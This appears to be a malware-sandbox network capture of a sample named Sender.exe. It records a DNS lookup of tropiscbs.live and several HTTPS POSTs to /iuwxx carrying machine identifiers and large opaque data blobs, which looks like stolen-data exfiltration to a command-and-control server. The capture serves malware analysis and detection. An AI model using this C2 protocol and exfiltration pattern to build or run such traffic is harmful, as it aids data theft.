                                                                      Apr 27, 2025 18:36:41.656183004 CEST44349718104.21.77.203192.168.2.4
                                                                      Apr 27, 2025 18:36:41.657440901 CEST49718443192.168.2.4104.21.77.203
                                                                      Apr 27, 2025 18:36:41.658149004 CEST49718443192.168.2.4104.21.77.203
                                                                      Apr 27, 2025 18:36:41.658184052 CEST44349718104.21.77.203192.168.2.4
                                                                      Apr 27, 2025 18:36:41.658271074 CEST49718443192.168.2.4104.21.77.203
                                                                      Apr 27, 2025 18:36:41.658305883 CEST44349718104.21.77.203192.168.2.4
                                                                      Apr 27, 2025 18:36:41.658397913 CEST49718443192.168.2.4104.21.77.203
                                                                      Apr 27, 2025 18:36:41.658440113 CEST44349718104.21.77.203192.168.2.4
                                                                      Apr 27, 2025 18:36:41.658534050 CEST49718443192.168.2.4104.21.77.203
                                                                      Apr 27, 2025 18:36:41.658557892 CEST44349718104.21.77.203192.168.2.4
                                                                      Apr 27, 2025 18:36:41.658669949 CEST49718443192.168.2.4104.21.77.203
                                                                      Apr 27, 2025 18:36:41.658696890 CEST44349718104.21.77.203192.168.2.4
                                                                      Apr 27, 2025 18:36:41.658822060 CEST49718443192.168.2.4104.21.77.203
                                                                      Apr 27, 2025 18:36:41.658848047 CEST44349718104.21.77.203192.168.2.4
                                                                      Apr 27, 2025 18:36:41.658855915 CEST49718443192.168.2.4104.21.77.203
                                                                      Apr 27, 2025 18:36:41.658971071 CEST49718443192.168.2.4104.21.77.203
                                                                      Apr 27, 2025 18:36:41.659001112 CEST49718443192.168.2.4104.21.77.203
                                                                      Apr 27, 2025 18:36:41.704268932 CEST44349718104.21.77.203192.168.2.4
                                                                      Apr 27, 2025 18:36:41.704416990 CEST49718443192.168.2.4104.21.77.203
                                                                      Apr 27, 2025 18:36:41.704447031 CEST49718443192.168.2.4104.21.77.203
                                                                      Apr 27, 2025 18:36:41.704456091 CEST49718443192.168.2.4104.21.77.203
                                                                      Apr 27, 2025 18:36:41.752264977 CEST44349718104.21.77.203192.168.2.4
                                                                      Apr 27, 2025 18:36:41.752571106 CEST49718443192.168.2.4104.21.77.203
                                                                      Apr 27, 2025 18:36:41.752621889 CEST49718443192.168.2.4104.21.77.203
                                                                      Apr 27, 2025 18:36:41.752654076 CEST49718443192.168.2.4104.21.77.203
                                                                      Apr 27, 2025 18:36:41.800268888 CEST44349718104.21.77.203192.168.2.4
                                                                      Apr 27, 2025 18:36:41.800399065 CEST49718443192.168.2.4104.21.77.203
                                                                      Apr 27, 2025 18:36:41.848282099 CEST44349718104.21.77.203192.168.2.4
                                                                      Apr 27, 2025 18:36:42.107753038 CEST44349718104.21.77.203192.168.2.4
                                                                      Apr 27, 2025 18:36:44.332032919 CEST44349718104.21.77.203192.168.2.4
                                                                      Apr 27, 2025 18:36:44.332140923 CEST44349718104.21.77.203192.168.2.4
                                                                      Apr 27, 2025 18:36:44.332218885 CEST49718443192.168.2.4104.21.77.203
                                                                      Apr 27, 2025 18:36:44.332344055 CEST49718443192.168.2.4104.21.77.203
                                                                      Apr 27, 2025 18:36:44.332355022 CEST44349718104.21.77.203192.168.2.4
                                                                      Apr 27, 2025 18:36:44.392538071 CEST49721443192.168.2.4104.21.77.203
                                                                      Apr 27, 2025 18:36:44.392585039 CEST44349721104.21.77.203192.168.2.4
                                                                      Apr 27, 2025 18:36:44.392848969 CEST49721443192.168.2.4104.21.77.203
                                                                      Apr 27, 2025 18:36:44.393182993 CEST49721443192.168.2.4104.21.77.203
                                                                      Apr 27, 2025 18:36:44.393194914 CEST44349721104.21.77.203192.168.2.4
                                                                      Apr 27, 2025 18:36:44.706757069 CEST44349721104.21.77.203192.168.2.4
                                                                      Apr 27, 2025 18:36:44.706835985 CEST49721443192.168.2.4104.21.77.203
                                                                      Apr 27, 2025 18:36:44.708271027 CEST49721443192.168.2.4104.21.77.203
                                                                      Apr 27, 2025 18:36:44.708292961 CEST44349721104.21.77.203192.168.2.4
                                                                      Apr 27, 2025 18:36:44.708542109 CEST44349721104.21.77.203192.168.2.4
                                                                      Apr 27, 2025 18:36:44.709938049 CEST49721443192.168.2.4104.21.77.203
                                                                      Apr 27, 2025 18:36:44.709965944 CEST49721443192.168.2.4104.21.77.203
                                                                      Apr 27, 2025 18:36:44.710028887 CEST44349721104.21.77.203192.168.2.4
                                                                      Apr 27, 2025 18:36:45.529730082 CEST44349721104.21.77.203192.168.2.4
                                                                      Apr 27, 2025 18:36:45.529789925 CEST44349721104.21.77.203192.168.2.4
                                                                      Apr 27, 2025 18:36:45.529946089 CEST49721443192.168.2.4104.21.77.203
                                                                      Apr 27, 2025 18:36:45.530088902 CEST49721443192.168.2.4104.21.77.203
                                                                      Apr 27, 2025 18:36:45.530107021 CEST44349721104.21.77.203192.168.2.4
                                                                      Apr 27, 2025 18:36:45.530119896 CEST49721443192.168.2.4104.21.77.203
                                                                      Apr 27, 2025 18:36:45.530124903 CEST44349721104.21.77.203192.168.2.4
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Apr 27, 2025 18:36:32.180352926 CEST | 53304 | 53 | 192.168.2.4 | 1.1.1.1
Apr 27, 2025 18:36:32.399466038 CEST | 53 | 53304 | 1.1.1.1 | 192.168.2.4

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Apr 27, 2025 18:36:32.180352926 CEST | 192.168.2.4 | 1.1.1.1 | 0xb45f | Standard query (0) | tropiscbs.live | A (IP address) | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Apr 27, 2025 18:36:32.399466038 CEST | 1.1.1.1 | 192.168.2.4 | 0xb45f | No error (0) | tropiscbs.live | (none) | 104.21.77.203 | A (IP address) | IN (0x0001) | false
Apr 27, 2025 18:36:32.399466038 CEST | 1.1.1.1 | 192.168.2.4 | 0xb45f | No error (0) | tropiscbs.live | (none) | 172.67.211.127 | A (IP address) | IN (0x0001) | false
• tropiscbs.live

Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49710 | 104.21.77.203 | 443 | 4768 | C:\Users\user\Desktop\Sender.exe

Timestamp | Bytes transferred | Direction | Data
2025-04-27 16:36:32 UTC | 264 | OUT | POST /iuwxx HTTP/1.1
  Connection: Keep-Alive
  Content-Type: application/x-www-form-urlencoded
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
  Content-Length: 41
  Host: tropiscbs.live
2025-04-27 16:36:32 UTC | 41 | OUT | Data Raw: 75 69 64 3d 31 32 64 38 39 38 37 34 30 63 31 31 34 36 34 39 32 30 31 62 66 32 66 31 66 31 37 66 39 36 66 30 26 63 69 64 3d
  Data Ascii: uid=12d898740c114649201bf2f1f17f96f0&cid=
2025-04-27 16:36:33 UTC | 244 | IN | HTTP/1.1 200 OK
  Date: Sun, 27 Apr 2025 16:36:33 GMT
  Content-Type: application/octet-stream
  Content-Length: 33581
  Connection: close
  Server: cloudflare
  Cf-Cache-Status: DYNAMIC
  CF-RAY: 936fbd4a595a52fb-LAX
  alt-svc: h3=":443"; ma=86400


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49711 | 104.21.77.203 | 443 | 4768 | C:\Users\user\Desktop\Sender.exe

Timestamp | Bytes transferred | Direction | Data
2025-04-27 16:36:34 UTC | 273 | OUT | POST /iuwxx HTTP/1.1
  Connection: Keep-Alive
  Content-Type: multipart/form-data; boundary=b9KQrht4n
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
  Content-Length: 19566
  Host: tropiscbs.live
2025-04-27 16:36:34 UTC | 15331 | OUT | Data Raw: 2d 2d 62 39 4b 51 72 68 74 34 6e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 69 64 22 0d 0a 0d 0a 31 32 64 38 39 38 37 34 30 63 31 31 34 36 34 39 32 30 31 62 66 32 66 31 66 31 37 66 39 36 66 30 0d 0a 2d 2d 62 39 4b 51 72 68 74 34 6e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 39 4b 51 72 68 74 34 6e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 42 44 39 30 44 34 38 38 37 44 44 46 35 35 45 36 42 38 35 39 30 46 43 33 43 45 46 30 33 46 37 0d 0a 2d 2d 62 39 4b 51
  Data Ascii: --b9KQrht4nContent-Disposition: form-data; name="uid"12d898740c114649201bf2f1f17f96f0--b9KQrht4nContent-Disposition: form-data; name="pid"2--b9KQrht4nContent-Disposition: form-data; name="hwid"0BD90D4887DDF55E6B8590FC3CEF03F7--b9KQ
                                                                      2025-04-27 16:36:34 UTC | 4235 | OUT | Data Raw: 80 ee be cb 60 57 19 43 4f c5 be 49 0e bf b4 6e ed 0b 52 a7 1c 11 ad 62 3e 87 ed 8e fa a9 f3 7a 84 95 19 b3 9d f0 75 86 c5 3f c0 94 99 39 16 24 b3 9b 9f 5c ec 0b c6 9b f2 70 0f ea 7b 63 cd 0d cb 84 58 ab f8 2e 6d 99 d6 e1 38 18 6a a4 53 d6 df ac d5 52 bc ca a9 57 05 17 28 49 b7 33 aa 04 93 26 a2 04 d3 0a cd 08 7c d8 52 c6 12 bd 88 3c aa 17 b7 e7 01 62 be 5f 89 2b 1b b3 ee ea 5d ff 74 da ef 62 8b 03 28 88 c9 1f 1b 9f c3 af 3e 69 36 ef 48 1b c4 12 97 27 0a f0 9a b4 a2 5c 58 f4 b6 32 ee 38 4c 14 34 b5 cf 7d ed 08 99 f1 93 86 73 13 99 0b 81 b5 ae 40 34 0e 36 6b e8 50 a6 6c be f4 4a 37 5f 24 cd 7a 5c 8f 6a f1 fb d1 69 6d 31 f1 8e c4 1a 0b 4e fe 68 8e d6 ca 04 8e 49 3e 2c 20 2d 5e 6e ab bc 4f 10 41 4a 30 d8 80 64 11 29 a1 21 ac a3 59 2c 63 b9 60 0b 0e bc 5c e5
                                                                      Data Ascii: `WCOInRb>zu?9$\p{cX.m8jSRW(I3&|R<b_+]tb(>i6H'\X28L4}s@46kPlJ7_$z\jim1NhI>, -^nOAJ0d)!Y,c`\
                                                                      2025-04-27 16:36:35 UTC | 264 | IN | HTTP/1.1 200 OK
                                                                      Date: Sun, 27 Apr 2025 16:36:35 GMT
                                                                      Content-Type: application/json
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      Server: cloudflare
                                                                      Vary: Accept-Encoding
                                                                      Cf-Cache-Status: DYNAMIC
                                                                      CF-RAY: 936fbd562b625269-LAX
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      2025-04-27 16:36:35 UTC | 76 | IN | Data Raw: 34 36 0d 0a 7b 22 73 75 63 63 65 73 73 22 3a 7b 22 6d 65 73 73 61 67 65 22 3a 22 6d 65 73 73 61 67 65 20 73 75 63 63 65 73 73 20 64 65 6c 69 76 65 72 79 20 66 72 6f 6d 20 31 37 33 2e 32 34 34 2e 35 36 2e 31 38 36 22 7d 7d 0d 0a
                                                                      Data Ascii: 46{"success":{"message":"message success delivery from 173.244.56.186"}}
                                                                      2025-04-27 16:36:35 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                      Data Ascii: 0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                      2 | 192.168.2.4 | 49712 | 104.21.77.203 | 443 | 4768 | C:\Users\user\Desktop\Sender.exe
                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                      2025-04-27 16:36:36 UTC | 277 | OUT | POST /iuwxx HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: multipart/form-data; boundary=Gnf88AvpKC995A
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
                                                                      Content-Length: 8748
                                                                      Host: tropiscbs.live
                                                                      2025-04-27 16:36:36 UTC | 8748 | OUT | Data Raw: 2d 2d 47 6e 66 38 38 41 76 70 4b 43 39 39 35 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 69 64 22 0d 0a 0d 0a 31 32 64 38 39 38 37 34 30 63 31 31 34 36 34 39 32 30 31 62 66 32 66 31 66 31 37 66 39 36 66 30 0d 0a 2d 2d 47 6e 66 38 38 41 76 70 4b 43 39 39 35 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 47 6e 66 38 38 41 76 70 4b 43 39 39 35 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 42 44 39 30 44 34 38 38 37 44 44 46 35 35 45 36 42 38 35 39 30 46 43 33
                                                                      Data Ascii: --Gnf88AvpKC995AContent-Disposition: form-data; name="uid"12d898740c114649201bf2f1f17f96f0--Gnf88AvpKC995AContent-Disposition: form-data; name="pid"2--Gnf88AvpKC995AContent-Disposition: form-data; name="hwid"0BD90D4887DDF55E6B8590FC3
                                                                      2025-04-27 16:36:37 UTC | 264 | IN | HTTP/1.1 200 OK
                                                                      Date: Sun, 27 Apr 2025 16:36:37 GMT
                                                                      Content-Type: application/json
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      Server: cloudflare
                                                                      Vary: Accept-Encoding
                                                                      Cf-Cache-Status: DYNAMIC
                                                                      CF-RAY: 936fbd5f18f01504-LAX
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      2025-04-27 16:36:37 UTC | 76 | IN | Data Raw: 34 36 0d 0a 7b 22 73 75 63 63 65 73 73 22 3a 7b 22 6d 65 73 73 61 67 65 22 3a 22 6d 65 73 73 61 67 65 20 73 75 63 63 65 73 73 20 64 65 6c 69 76 65 72 79 20 66 72 6f 6d 20 31 37 33 2e 32 34 34 2e 35 36 2e 31 38 36 22 7d 7d 0d 0a
                                                                      Data Ascii: 46{"success":{"message":"message success delivery from 173.244.56.186"}}
                                                                      2025-04-27 16:36:37 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                      Data Ascii: 0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                      3 | 192.168.2.4 | 49715 | 104.21.77.203 | 443 | 4768 | C:\Users\user\Desktop\Sender.exe
                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                      2025-04-27 16:36:37 UTC | 275 | OUT | POST /iuwxx HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: multipart/form-data; boundary=CCvd1Ar39E9
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
                                                                      Content-Length: 20386
                                                                      Host: tropiscbs.live
                                                                      2025-04-27 16:36:37 UTC | 15331 | OUT | Data Raw: 2d 2d 43 43 76 64 31 41 72 33 39 45 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 69 64 22 0d 0a 0d 0a 31 32 64 38 39 38 37 34 30 63 31 31 34 36 34 39 32 30 31 62 66 32 66 31 66 31 37 66 39 36 66 30 0d 0a 2d 2d 43 43 76 64 31 41 72 33 39 45 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 43 43 76 64 31 41 72 33 39 45 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 42 44 39 30 44 34 38 38 37 44 44 46 35 35 45 36 42 38 35 39 30 46 43 33 43 45 46 30 33 46 37 0d 0a
                                                                      Data Ascii: --CCvd1Ar39E9Content-Disposition: form-data; name="uid"12d898740c114649201bf2f1f17f96f0--CCvd1Ar39E9Content-Disposition: form-data; name="pid"3--CCvd1Ar39E9Content-Disposition: form-data; name="hwid"0BD90D4887DDF55E6B8590FC3CEF03F7
                                                                      2025-04-27 16:36:37 UTC | 5055 | OUT | Data Raw: 0c 85 34 51 94 2d 76 e0 12 a5 5d a4 cb 16 ca 43 07 14 c8 46 21 c2 04 73 cf 35 73 7b 3f 2f 4b 8e 41 59 00 0c 33 b4 af 42 96 c1 b6 48 17 97 51 35 4b 15 c5 95 f9 d5 77 e7 c9 ec 5e 04 f2 aa 05 f8 7f fd 14 d2 58 aa 96 77 08 e1 eb 68 6e d8 ba 50 c7 46 fb 31 fe 3d 6c 3b 70 cb 4d 9e c5 8e 8e 69 b6 10 02 3b 4b ea e5 f7 1f e9 a3 03 55 23 c7 79 47 be 5a db 31 a0 55 d7 40 0a 28 61 a6 8e 2b 79 4c fc e8 38 79 9d e8 06 27 16 7a 75 e2 6c f2 54 e3 6f e9 3e b9 00 cf 4b 28 fb 4d 71 f1 4c 07 69 89 d7 cd 6f 7c bf 44 08 f0 67 f7 6b 3c d7 66 fb 00 19 c0 e0 b2 b6 b1 29 11 f7 96 e5 9d 2c bb ff 5f f2 5f 7d dd 97 79 e8 7a 3c d1 1c 6f fa 08 14 10 b4 25 6a 45 3a 01 ad 25 26 17 cd b9 86 ef f0 e3 c4 cd bd 33 0a 82 f0 1a 5b d8 75 3b 04 8c 50 cf d1 45 3b 86 2e 91 f6 dc 81 07 ca af 2b f7
                                                                      Data Ascii: 4Q-v]CF!s5s{?/KAY3BHQ5Kw^XwhnPF1=l;pMi;KU#yGZ1U@(a+yL8y'zulTo>K(MqLio|Dgk<f),__}yz<o%jE:%&3[u;PE;.+
                                                                      2025-04-27 16:36:38 UTC | 264 | IN | HTTP/1.1 200 OK
                                                                      Date: Sun, 27 Apr 2025 16:36:38 GMT
                                                                      Content-Type: application/json
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      Server: cloudflare
                                                                      Vary: Accept-Encoding
                                                                      Cf-Cache-Status: DYNAMIC
                                                                      CF-RAY: 936fbd680efbf0e2-LAX
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      2025-04-27 16:36:38 UTC | 76 | IN | Data Raw: 34 36 0d 0a 7b 22 73 75 63 63 65 73 73 22 3a 7b 22 6d 65 73 73 61 67 65 22 3a 22 6d 65 73 73 61 67 65 20 73 75 63 63 65 73 73 20 64 65 6c 69 76 65 72 79 20 66 72 6f 6d 20 31 37 33 2e 32 34 34 2e 35 36 2e 31 38 36 22 7d 7d 0d 0a
                                                                      Data Ascii: 46{"success":{"message":"message success delivery from 173.244.56.186"}}
                                                                      2025-04-27 16:36:38 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                      Data Ascii: 0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                      4 | 192.168.2.4 | 49717 | 104.21.77.203 | 443 | 4768 | C:\Users\user\Desktop\Sender.exe
                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                      2025-04-27 16:36:40 UTC | 273 | OUT | POST /iuwxx HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: multipart/form-data; boundary=3Q5bUbGM7Q
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
                                                                      Content-Length: 2221
                                                                      Host: tropiscbs.live
                                                                      2025-04-27 16:36:40 UTC | 2221 | OUT | Data Raw: 2d 2d 33 51 35 62 55 62 47 4d 37 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 69 64 22 0d 0a 0d 0a 31 32 64 38 39 38 37 34 30 63 31 31 34 36 34 39 32 30 31 62 66 32 66 31 66 31 37 66 39 36 66 30 0d 0a 2d 2d 33 51 35 62 55 62 47 4d 37 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 33 51 35 62 55 62 47 4d 37 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 42 44 39 30 44 34 38 38 37 44 44 46 35 35 45 36 42 38 35 39 30 46 43 33 43 45 46 30 33 46 37 0d 0a 2d 2d 33
                                                                      Data Ascii: --3Q5bUbGM7QContent-Disposition: form-data; name="uid"12d898740c114649201bf2f1f17f96f0--3Q5bUbGM7QContent-Disposition: form-data; name="pid"1--3Q5bUbGM7QContent-Disposition: form-data; name="hwid"0BD90D4887DDF55E6B8590FC3CEF03F7--3
                                                                      2025-04-27 16:36:40 UTC | 264 | IN | HTTP/1.1 200 OK
                                                                      Date: Sun, 27 Apr 2025 16:36:40 GMT
                                                                      Content-Type: application/json
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      Server: cloudflare
                                                                      Vary: Accept-Encoding
                                                                      Cf-Cache-Status: DYNAMIC
                                                                      CF-RAY: 936fbd76ec00150c-LAX
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      2025-04-27 16:36:40 UTC | 76 | IN | Data Raw: 34 36 0d 0a 7b 22 73 75 63 63 65 73 73 22 3a 7b 22 6d 65 73 73 61 67 65 22 3a 22 6d 65 73 73 61 67 65 20 73 75 63 63 65 73 73 20 64 65 6c 69 76 65 72 79 20 66 72 6f 6d 20 31 37 33 2e 32 34 34 2e 35 36 2e 31 38 36 22 7d 7d 0d 0a
                                                                      Data Ascii: 46{"success":{"message":"message success delivery from 173.244.56.186"}}
                                                                      2025-04-27 16:36:40 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                      Data Ascii: 0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                      5 | 192.168.2.4 | 49718 | 104.21.77.203 | 443 | 4768 | C:\Users\user\Desktop\Sender.exe
                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                      2025-04-27 16:36:41 UTC | 277 | OUT | POST /iuwxx HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: multipart/form-data; boundary=G439QGWWjdM6
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
                                                                      Content-Length: 551525
                                                                      Host: tropiscbs.live
                                                                      2025-04-27 16:36:41 UTC | 15331 | OUT | Data Raw: 2d 2d 47 34 33 39 51 47 57 57 6a 64 4d 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 69 64 22 0d 0a 0d 0a 31 32 64 38 39 38 37 34 30 63 31 31 34 36 34 39 32 30 31 62 66 32 66 31 66 31 37 66 39 36 66 30 0d 0a 2d 2d 47 34 33 39 51 47 57 57 6a 64 4d 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 47 34 33 39 51 47 57 57 6a 64 4d 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 42 44 39 30 44 34 38 38 37 44 44 46 35 35 45 36 42 38 35 39 30 46 43 33 43 45 46 30 33 46
                                                                      Data Ascii: --G439QGWWjdM6Content-Disposition: form-data; name="uid"12d898740c114649201bf2f1f17f96f0--G439QGWWjdM6Content-Disposition: form-data; name="pid"1--G439QGWWjdM6Content-Disposition: form-data; name="hwid"0BD90D4887DDF55E6B8590FC3CEF03F
                                                                      2025-04-27 16:36:41 UTC | 15331 | OUT | Data Raw: 85 de 3c 71 be dc ff 34 9e b0 b0 1a e1 d4 da 6b 18 12 5b a1 04 3b 2d f3 43 cd 39 cd 39 0d 2e 6d 83 78 94 d2 9e 9d f2 b3 24 d5 68 aa fe f9 85 03 09 cb 89 52 bb 76 5e 37 a3 30 7a 78 55 6e 61 a0 83 55 0d 39 26 7e 2b e8 52 8d 04 80 27 c0 d3 75 99 08 21 aa d3 6b a2 41 8b 93 e2 4b d9 d6 bf 99 c3 ff 6b dd 8d 53 fb 74 10 f2 07 d9 25 37 24 05 eb 42 6d 32 41 a6 01 da ec 18 c6 fe c6 58 b8 8e c5 2d e2 bc b3 bc 3d 2e eb 04 92 57 b0 85 c9 ad cb 70 42 85 89 33 33 fd 4d 29 e7 33 61 f0 a3 15 32 a4 1e 61 d3 4c a4 6c b8 55 6e 09 1f d6 fe af 49 cc 14 7c 41 f8 83 b0 9e 76 1f da e2 b5 45 68 00 4e 59 6e 90 31 bd 5b 52 28 80 60 f4 c1 aa 5e 93 e0 5d 24 04 87 25 15 72 a5 81 3d 13 25 43 57 04 51 96 b4 3c a8 a5 61 29 76 83 fe 48 28 c1 00 9e 9d f0 0b 8a 8f d1 b2 cd fa 07 3c 8d b2 7c
                                                                      Data Ascii: <q4k[;-C99.mx$hRv^70zxUnaU9&~+R'u!kAKkSt%7$Bm2AX-=.WpB33M)3a2aLlUnI|AvEhNYn1[R(`^]$%r=%CWQ<a)vH(<|
                                                                      2025-04-27 16:36:41 UTC | 15331 | OUT | Data Raw: b1 4b 44 c5 ab c1 a4 b6 67 37 db 09 15 77 61 13 77 3a e2 d3 1c bf e8 42 65 bb 49 c5 c4 11 10 2a 6d 26 45 a7 bb c2 a1 66 bb ab 28 bd d2 f1 9a ef 43 c8 9b ee 20 f5 ce 17 39 b0 78 66 c8 e2 b4 27 16 31 51 0e 13 d3 b2 60 ba 3c f7 ab af 4a 45 75 e6 08 e0 0a c2 25 38 50 80 ee f3 af 0b 64 a9 2c 20 73 dc 9f 63 ae 50 38 14 10 0d 3a 15 34 00 0a 68 ce 44 0c 89 bb af 5d 20 9a de 59 aa db 51 58 0c 7d 31 da 09 4d 7f 9c 59 f4 a5 c1 67 2c d3 c1 59 43 0e d5 c7 97 30 e0 76 15 ee 42 d5 7a e3 8c f0 0d 84 b6 25 21 4a 25 f7 32 de c3 fd 83 37 b5 b0 b0 e5 57 86 e9 09 9b 40 dd f4 00 4e 8f 25 62 9c 99 77 c4 8e ee 8c dd d4 15 e0 b7 a1 23 c7 0d 97 49 15 75 98 37 70 9f 8c a1 57 de 4c 9e 38 5d 6f 1c 10 df 47 73 ae b7 43 5e 50 c1 ff 1f ef ec f5 52 7f 8c d2 e0 18 6c da e0 a4 6e bc 8e bd
                                                                      Data Ascii: KDg7waw:BeI*m&Ef(C 9xf'1Q`<JEu%8Pd, scP8:4hD] YQX}1MYg,YC0vBz%!J%27W@N%bw#Iu7pWL8]oGsC^PRln
